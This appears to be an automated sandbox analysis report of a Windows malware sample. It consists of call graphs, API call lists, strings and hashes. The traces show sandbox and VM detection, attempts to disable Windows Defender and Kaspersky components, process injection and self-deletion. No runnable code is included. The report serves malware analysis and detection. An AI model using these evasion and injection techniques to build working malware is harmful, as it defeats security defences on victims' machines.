30618->30621 30628 401819 30618->30628 30622 401862 GetHandleInformation 30619->30622 30623 40188e RtlCreateUserThread 30619->30623 30620->30605 30621->30618 30624 4017c9 memcpy WriteProcessMemory VirtualFree 30621->30624 30625 401885 30622->30625 30626 401878 30622->30626 30623->30615 30624->30618 30625->30615 30626->30625 30627 40187e CloseHandle 30626->30627 30627->30625 30628->30619 30630 402ad0 30629->30630 30630->30630 30631 402adf PathFileExistsA 30630->30631 30632 402af2 GetSystemWindowsDirectoryA 30631->30632 30633 402bf9 _snprintf CopyFileA 30631->30633 30636 402b07 30632->30636 30634 402d26 30633->30634 30635 402c36 30633->30635 30668 4012b0 VirtualQuery GetModuleFileNameA PathFileExistsA 30634->30668 30637 402930 9 API calls 30635->30637 30636->30636 30638 402b0f GetModuleHandleA 30636->30638 30639 402c3f 30637->30639 30640 402b67 30638->30640 30641 402b47 GetProcAddress 30638->30641 30680 401b20 30639->30680 30642 402b96 GetTickCount 30640->30642 30658 402b6d 30640->30658 30641->30640 30644 402b59 GetCurrentProcess 30641->30644 30730 401390 GetTickCount GetModuleHandleA GetProcAddress 30642->30730 30644->30640 30648 402ba2 30731 401420 GetTickCount GetModuleHandleA GetProcAddress 30648->30731 30651 402c59 RtlImageNtHeader 30653 402c64 EntryPoint 30651->30653 30654 402c7d GetProcessHeap HeapValidate 30651->30654 30652 402c9d 30708 401be0 CreateFileA 30652->30708 30653->30654 30654->30652 30656 402c92 GetProcessHeap HeapFree 30654->30656 30656->30652 30658->30633 30658->30658 30659 402cef 30662 402cff GlobalFindAtomA 30659->30662 30719 4014b0 memset memset lstrcpynA CreateProcessA 30659->30719 30660 402ccf GetProcAddress 30660->30659 30661 402ce1 GetCurrentProcess 30660->30661 30661->30659 30664 402d1b GlobalAddAtomA 30662->30664 30665 402d0f 30662->30665 30664->30634 30666 4012b0 9 API calls 30665->30666 30667 402d14 ExitProcess 30666->30667 30669 40137f 30668->30669 30670 40130c GetTempPathA GetTempFileNameA MoveFileExA 30668->30670 30669->30525 30670->30669 30671 401353 SetFileAttributesA DeleteFileA 30670->30671 30671->30669 30672 401373 MoveFileExA 30671->30672 30672->30669 30673->30489 30674->30509 30675->30525 30676->30534 30677->30533 30678->30600 30679->30604 30681 401bd7 30680->30681 30682 401b3b 30680->30682 30692 401150 30681->30692 30683 401150 16 API calls 30682->30683 30684 401b44 30683->30684 30684->30681 30685 401b4e RtlImageNtHeader 30684->30685 30686 401bb5 GetProcessHeap HeapValidate 30685->30686 30687 401b5b GetTickCount GetModuleHandleA 30685->30687 30686->30681 30690 401bcb GetProcessHeap HeapFree 30686->30690 30688 401b95 EntryPoint 30687->30688 30689 401b7e GetProcAddress 30687->30689 30688->30686 30689->30688 30691 401b8e 30689->30691 30690->30681 30691->30688 30693 401166 CreateFileA 30692->30693 30694 40127b 30692->30694 30693->30694 30696 401188 GetFileSizeEx 30693->30696 30695 401282 IsBadWritePtr 30694->30695 30697 401291 30694->30697 30695->30697 30698 40124a 30696->30698 30699 4011a7 GetProcessHeap RtlAllocateHeap 30696->30699 30697->30651 30697->30652 30698->30694 30700 40125f GetHandleInformation 30698->30700 30701 4011d5 30699->30701 30702 4011c6 memset 30699->30702 30700->30694 30704 40126e 30700->30704 30701->30698 30703 4011dc SetFilePointer LockFile ReadFile UnlockFile 30701->30703 30702->30701 30703->30698 30705 401228 GetProcessHeap HeapValidate 30703->30705 30704->30694 30706 401274 CloseHandle 30704->30706 30705->30698 30707 40123e GetProcessHeap HeapFree 30705->30707 30706->30694 30707->30698 30709 401c12 GetFileTime 30708->30709 30710 401ca5 MoveFileExA GetModuleHandleA 30708->30710 30711 401c30 GetHandleInformation 30709->30711 30712 401c4c CreateFileA 30709->30712 30710->30659 30710->30660 30711->30712 30713 401c3f 30711->30713 30712->30710 30714 401c6b SetFileTime 30712->30714 30713->30712 30715 401c45 CloseHandle 30713->30715 30714->30710 30716 401c89 GetHandleInformation 30714->30716 30715->30712 30716->30710 30717 401c98 30716->30717 30717->30710 30718 401c9e CloseHandle 30717->30718 30718->30710 30720 401533 30719->30720 30721 40158f 30719->30721 30722 401545 GetHandleInformation 30720->30722 30723 40155d 30720->30723 30721->30662 30722->30723 30724 401550 30722->30724 30725 401581 30723->30725 30726 401569 GetHandleInformation 30723->30726 30724->30723 30727 401556 CloseHandle 30724->30727 30725->30662 30726->30725 30728 401574 30726->30728 30727->30723 30728->30725 30729 40157a CloseHandle 30728->30729 30729->30725 30730->30648 30731->30658

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00402D30 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 402d30-402d62 LoadLibraryA GetModuleFileNameA call 403a20 3 402d64-402d66 ExitProcess 0->3 4 402d6c-402d87 call 4021d0 call 4020e0 FindWindowA 0->4 9 402da1-402dbf call 402360 call 402450 call 402540 call 402680 IsUserAnAdmin 4->9 10 402d89-402d9b GetTickCount PostMessageA 4->10 19 402dc1-402dc8 call 401ea0 9->19 20 402de3-402dfb IsUserAnAdmin GetModuleHandleA 9->20 10->9 28 402dd2-402dd9 call 403560 19->28 29 402dca-402dcc ExitProcess 19->29 22 402e1c-402e20 20->22 23 402dfd-402e0d GetProcAddress 20->23 26 402e22-402e24 22->26 27 402e6e-402e70 22->27 23->22 25 402e0f-402e19 GetCurrentProcess 23->25 25->22 32 402e26-402e3a StrStrIA 26->32 33 402e3c-402e5a call 402930 GetCurrentProcessId call 401670 Sleep 26->33 30 402e76-402e8a StrStrIA 27->30 31 402efd-402f16 call 402930 GlobalFindAtomA 27->31 28->20 51 402ddb-402ddd ExitProcess 28->51 38 402ea1-402eb4 call 402a70 GlobalFindAtomA 30->38 39 402e8c-402e9c call 402930 call 4028d0 30->39 48 402f58-402f5a ExitProcess 31->48 49 402f18-402f27 GlobalAddAtomA IsUserAnAdmin 31->49 32->33 34 402e5f-402e64 call 402a70 call 4012b0 32->34 33->48 65 402e69 34->65 54 402ef6-402efb call 4012b0 38->54 55 402eb6-402ec5 GlobalAddAtomA IsUserAnAdmin 38->55 39->48 56 402f39-402f42 IsUserAnAdmin 49->56 57 402f29-402f31 49->57 54->48 61 402ed7-402ee0 IsUserAnAdmin 55->61 62 402ec7-402ecf 55->62 63 402f44 56->63 64 402f49-402f51 call 4015a0 56->64 57->56 68 402ee2 61->68 69 402ee7-402eef call 4015a0 61->69 62->61 63->64 64->48 74 402f53 call 401670 64->74 65->48 68->69 69->54 75 402ef1 call 401670 69->75 74->48 75->54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$PnSw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3353599405-1027215798
                                                                                                                                                                                                              • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                              Function 00403A20 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 127 403a20-403a68 RegOpenKeyExA 128 403a6a-403a8d RegQueryValueExA 127->128 129 403acd-403b05 GetUserNameA CharUpperA strstr 127->129 130 403a9b-403aac RegCloseKey 128->130 131 403a8f-403a99 RegCloseKey 128->131 132 403beb 129->132 133 403b0b-403b1e strstr 129->133 130->129 134 403aae-403ab5 130->134 131->129 135 403bec-403bf2 132->135 133->132 136 403b24-403b37 strstr 133->136 134->129 137 403ab7-403abe 134->137 136->132 138 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 136->138 137->129 139 403ac0-403ac7 137->139 138->132 140 403b7d-403b82 138->140 139->129 139->135 140->132 141 403b84-403b89 140->141 141->132 142 403b8b-403b90 141->142 142->132 143 403b92-403b97 142->143 143->132 144 403b99-403bc3 GetModuleFileNameA StrStrIA 143->144 144->132 145 403bc5-403bd5 StrStrIA 144->145 145->132 146 403bd7-403be7 StrStrIA 145->146 146->132 147 403be9 146->147 147->132
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                              • API String ID: 1431998568-3499098167
                                                                                                                                                                                                              • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                              Function 004021D0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 148 4021d0-40231e CreateFileA 149 402350-402355 148->149 150 402320-40234a DeviceIoControl CloseHandle 148->150 150->149
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                              Function 00401150 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 133memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 151 401150-401160 152 401166-401182 CreateFileA 151->152 153 40127b-401280 151->153 152->153 156 401188-4011a1 GetFileSizeEx 152->156 154 401282-40128f IsBadWritePtr 153->154 155 40129f 153->155 157 4012a1-4012a7 154->157 158 401291-40129c 154->158 155->157 159 401254-40125d 156->159 160 4011a7-4011c4 GetProcessHeap RtlAllocateHeap 156->160 159->153 161 40125f-40126c GetHandleInformation 159->161 162 4011d5-4011da 160->162 163 4011c6-4011d2 memset 160->163 161->153 165 40126e-401272 161->165 162->159 164 4011dc-401226 SetFilePointer LockFile ReadFile UnlockFile 162->164 163->162 166 401251 164->166 167 401228-40123c GetProcessHeap HeapValidate 164->167 165->153 168 401274-401275 CloseHandle 165->168 166->159 169 40124a 167->169 170 40123e-401244 GetProcessHeap HeapFree 167->170 168->153 169->166 170->169
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 2214028410-3313068137
                                                                                                                                                                                                              • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                              Function 00401B20 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 66memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 272 401b20-401b35 273 401bd7-401bdd 272->273 274 401b3b-401b48 call 401150 272->274 274->273 277 401b4e-401b59 RtlImageNtHeader 274->277 278 401bb5-401bc9 GetProcessHeap HeapValidate 277->278 279 401b5b-401b7c GetTickCount GetModuleHandleA 277->279 278->273 282 401bcb-401bd1 GetProcessHeap HeapFree 278->282 280 401b95-401bb0 EntryPoint 279->280 281 401b7e-401b8c GetProcAddress 279->281 280->278 281->280 283 401b8e 281->283 282->273 283->280
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • EntryPoint.UAVINOSIQH(00000000), ref: 00401BB0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateEntryHandleHeaderImageLockModulePointPointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 193611197-905597979
                                                                                                                                                                                                              • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                              Function 004020E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 284 4020e0-40213c memset SHGetFolderPathA 285 4021a7-4021a9 284->285 286 40213e-40215f PathAppendA SetCurrentDirectoryA 284->286 287 4021b2-4021c2 285->287 288 4021ab-4021ac FreeLibrary 285->288 286->285 289 402161-402173 LoadLibraryA 286->289 288->287 289->285 290 402175-402183 GetProcAddress 289->290 290->285 291 402185-402192 290->291 291->285
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726
                                                                                                                                                                                                              • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                              Function 00402680 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
